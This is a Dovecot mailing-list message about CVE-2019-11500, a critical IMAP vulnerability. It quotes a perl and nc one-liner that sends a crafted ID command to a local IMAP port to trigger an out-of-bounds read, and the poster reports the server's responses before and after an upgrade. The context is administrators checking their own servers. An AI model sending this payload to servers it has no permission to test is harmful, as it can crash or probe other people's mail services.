CVE-2019-11500: Critical vulnerability in Dovecot and Pigeonhole

KSB listeem at ksb.id.lv
Wed Sep 4 01:22:56 EEST 2019


On 2019.09.03. 22:32, KSB via dovecot wrote:
> On 2019.08.28. 15:10, Aki Tuomi via dovecot wrote:
>>
>> Steps to reproduce:
>>
>> This bug is best observed using valgrind to see the out-of-bounds read
>> with the following snippet:
>>
>> perl -e 'print "a id (\"foo\" \"".("x"x1021)."\\A\" \"bar\"
>> \"\000".("x"x1020)."\\A\")\n"' | nc localhost 143
>>
>>
> 
> Hi!
> Before, I had 2.2.25 and the returned result was:
> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE 
> IDLE STARTTLS AUTH=PLAIN AUTH=LOGIN] Dovecot ready.
> a BAD Missing ')'
> 
> Now I upgraded to 2.2.36.4 and the result is the same.
> 
> -- 
> KSB

Btw, got 1 time:
perl -e 'print "a id (\"foo\" \"".("x"x1021)."\\A\" \"bar\"
\"\000".("x"x1020)."\\A\")\n"' | nc localhost 143
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE 
IDLE STARTTLS AUTH=PLAIN AUTH=LOGIN] Dovecot ready.
a BAD Missing ')'
* BYE Input buffer full, aborting

with 2.2.36.4

--
KSB

